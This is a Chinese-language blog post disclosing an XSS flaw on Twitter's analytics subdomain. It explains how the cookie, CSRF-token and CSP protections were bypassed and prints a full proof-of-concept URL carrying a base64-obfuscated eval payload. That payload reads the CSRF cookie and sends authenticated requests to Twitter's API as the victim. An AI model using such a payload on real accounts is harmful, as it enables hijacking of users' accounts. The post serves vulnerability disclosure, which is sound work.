背景介绍
通过点击精心设计的链接或访问某些精心设计的网页,将允许攻击者接管受害者帐户(从而使用受害者帐户进行发帖、点赞、甚至更新个人资料、删除帐户等操作),不知道大家还记得新浪微博2011年曾受到过xss蠕虫攻击的事件不?
12月11日,推特网友 rabbit@_2333 在推特上发布了子域 https://analytics.twitter.com 上关于XSS的详细信息,让我们来看看这个漏洞是如何被发现,又是如何实现的吧~
漏洞披露
首先这个 XSS 漏洞似乎只能弹出一个警告框,因为:
-
Twitter 的 Cookies 是 HttpOnly的,意味着使用 Javascript 来读取Cookies是不可能的
-
有CSRF令牌,所以无法实现CSRF攻击
-
Twitter有着严格的CSP策略,因此无法实施 CSRF 攻击
然而,在 https://api.twitter.com 上一些未注明的端点也支持使用 Cookie 进行访问,这就意味着 Twitter 子域上的任何 XSS 都可以向 https://api.twitter.com 发送请求并假冒用户,这就解决上面的问题 1 和 3。
通过对 https://twitter.com/的 JS 代码进行逆向分析,白帽小哥发现 CSRF 令牌只是 Cookie 中 csrf_id 的哈希值,令人惊讶的是,csrf_id 不是 HttpOnly Cookie,这就意味着子域 XSS 可以读取此 csrf_id 并创建 CSRF 令牌。这就解决上面的问题2。
于是便可以得到完整的 JS 漏洞来实现这个 XSS 攻击链!
PoC代码:
https://analytics.twitter.com/mob_idsync_click?BKLISTID=fbzzx&Country=fxpzg&FSale_25Offer_RLE_Ends_EPD00E25=fwngn&OrgURL=cvvff&TIBCO=v6zjh&_101_returnToFullPageURL=otohn&ad_tracking=true&bep_csid=b3atc&brzu=nj1zx&cc=vg6yk&device_id=thlat&embtrk=r32wa&hideCard=g8b7k&idb=AAAAEICqlMGCMk-gSiMpMuNiRkC-SR1GJ1-zqKcpLy1Hrmbe9fxsnRpuyLA6TP25Zu8ATg93eSHJoznfQpU7JEl0f62r5Pe2LWJWQUzL_4ACZlFDOqZ1HXMYjZ-HNR44awQbp-aYickBlzMBKzP0qBykrS_Veox31HBnRjXPeqqyqkxSQ5cObnSxYNYbPQTRyiSOx3kS-f6ZiBIHxtBwbX1PHr6fgstZjZqMR_56ZohShKJeO8z2TPXZuisb7KmTI2J7qLg75L0xPv9_btDhj0Rc1g&ke_efl=t2tk5&pcode=h70ud&prev_fmts=eydk9&q_mailing_7TUwnpGAByUKFEoRC3VwHdrbpSRRaXie9kfMJ=zj7zd&segment_index=zey6z&sfvc4enews=mc1uc&slug=mmkDvcuyDJ&subscribe_cta=hmwlm&tailored_ads=true&twclid=%22-eval(atob(%22ZnVuY3Rpb24gaShlLCB0KSB7CiAgICB0cnkgewogICAgICAgIHJldHVybiB0KGUpCiAgICB9IGNhdGNoICh0KSB7CiAgICAgICAgcmV0dXJuIGUKICAgIH0KfQpwYXJzZSA9IGZ1bmN0aW9uKGUsIHQpIHsKICAgIGlmICgic3RyaW5nIiAhPSB0eXBlb2YgZSkKICAgICAgICB0aHJvdyBuZXcgVHlwZUVycm9yKCJhcmd1bWVudCBzdHIgbXVzdCBiZSBhIHN0cmluZyIpOwogICAgZm9yICh2YXIgciA9IHt9LCBhID0gdCB8fCB7fSwgYyA9IGUuc3BsaXQoLzsgKi8pLCBvID0gYS5kZWNvZGUgfHxkZWNvZGVVUklDb21wb25lbnQsIHUgPSAwOyB1IDwgYy5sZW5ndGg7IHUrKykgewogICAgICAgIHZhciBsID0gY1t1XQogICAgICAgICAgLCBkID0gbC5pbmRleE9mKCI9Iik7CiAgICAgICAgaWYgKCEoZCA8IDApKSB7CiAgICAgICAgICAgIHZhciBtID0gbC5zdWJzdHIoMCwgZCkudHJpbSgpCiAgICAgICAgICAgICAgLCBwID0gbC5zdWJzdHIoKytkLCBsLmxlbmd0aCkudHJpbSgpOwogICAgICAgICAgICAnIicgPT0gcFswXSAmJiAocCA9IHAuc2xpY2UoMSwgLTEpKSwKICAgICAgICAgICAgbnVsbCA9PSByW21dICYmIChyW21dID0gaShwLCBvKSkKICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gcgp9CgpmZXRjaCgiaHR0cHM6Ly9hcGkudHdpdHRlci5jb20vZ3JhcGhxbC9sSTA3TjZPdHd2MVBobkVnWElMTTdBL0Zhdm9yaXRlVHdlZXQiLCB7CiAgImhlYWRlcnMiOiB7CiAgICAiYWNjZXB0IjogIiovKiIsCiAgICAiYWNjZXB0LWxhbmd1YWdlIjogInpoLUNOLHpoO3E9MC45LGVuO3E9MC44IiwKICAgICJhdXRob3JpemF0aW9uIjogIkJlYXJlciBBQUFBQUFBQUFBQUFBQUFBQUFBQUFOUklMZ0FBQUFBQW5Od0l6VWVqUkNPdUg1RTZJOHhuWno0cHVUcyUzRDFadjd0dGZrOExGODFJVXExNmNIamhMVHZKdTRGQTMzQUdXV2pDcFRuQSIsCiAgICAiY29udGVudC10eXBlIjogImFwcGxpY2F0aW9uL2pzb24iLAogICAgInNlYy1jaC11YSI6ICJcIkdvb2dsZSBDaHJvbWVcIjt2PVwiMTE5XCIsIFwiQ2hyb21pdW1cIjt2PVwiMTE5XCIsIFwiTm90P0FfQnJhbmRcIjt2PVwiMjRcIiIsCiAgICAic2VjLWNoLXVhLW1vYmlsZSI6ICI/MCIsCiAgICAic2VjLWNoLXVhLXBsYXRmb3JtIjogIlwibWFjT1NcIiIsCiAgICAic2VjLWZldGNoLWRlc3QiOiAiZW1wdHkiLAogICAgInNlYy1mZXRjaC1tb2RlIjogImNvcnMiLAogICAgInNlYy1mZXRjaC1zaXRlIjogInNhbWUtb3JpZ2luIiwKICAgICJ4LWNsaWVudC10cmFuc2FjdGlvbi1pZCI6ICI1OWYxYnlDM1FyRVFKRGRIaUo4cWt1b0JzQTFBU2FOVFdIWUUxU2FIa3Z6elMvazNVQ0dzNWJtcmNzWG1ENDN6RjMyRHp1WUlGNGQ3elFVU3o4bW9OeldKa213YTVnIiwKICAgICJ4LWNsaWVudC11dWlkIjogImJlYWJjYjk4LWZmMjMtNDVkOS05ZDE1LTY0YmU0ODQxODYwOCIsCiAgICAieC1jc3JmLXRva2VuIjogcGFyc2UoZG9jdW1lbnQuY29va2llKS5jdDAsCiAgICAieC10d2l0dGVyLWFjdGl2ZS11c2VyIjogInllcyIsCiAgICAieC10d2l0dGVyLWF1dGgtdHlwZSI6ICJPQXV0aDJTZXNzaW9uIiwKICAgICJ4LXR3aXR0ZXItY2xpZW50LWxhbmd1YWdlIjogImVuIgogIH0sCiAgInJlZmVycmVyIjogImh0dHBzOi8vdHdpdHRlci5jb20vc2hvdWNjY2Mvc3RhdHVzLzE3MzQ2ODQ4NTAxNzM3Mzk0MTIiLAogICJyZWZlcnJlclBvbGljeSI6ICJzdHJpY3Qtb3JpZ2luLXdoZW4tY3Jvc3Mtb3JpZ2luIiwKICAiYm9keSI6ICJ7XCJ2YXJpYWJsZXNcIjp7XCJ0d2VldF9pZFwiOlwiMTczNDY4NDg1MDE3MzczOTQxMlwifSxcInF1ZXJ5SWRcIjpcImxJMDdONk90d3YxUGhuRWdYSUxNN0FcIn0iLAogICJtZXRob2QiOiAiUE9TVCIsCiAgIm1vZGUiOiAiY29ycyIsCiAgICAgICJjcmVkZW50aWFscyI6ICJpbmNsdWRlIgp9KTs=%22))-%22 
从演示视频中可以看到,当访问了精心构造的URL后,受害者的Twitter个人信息被修改。
然后Twitter忽视了这项安全问题,并表示不会向白帽子支付赏金费用…
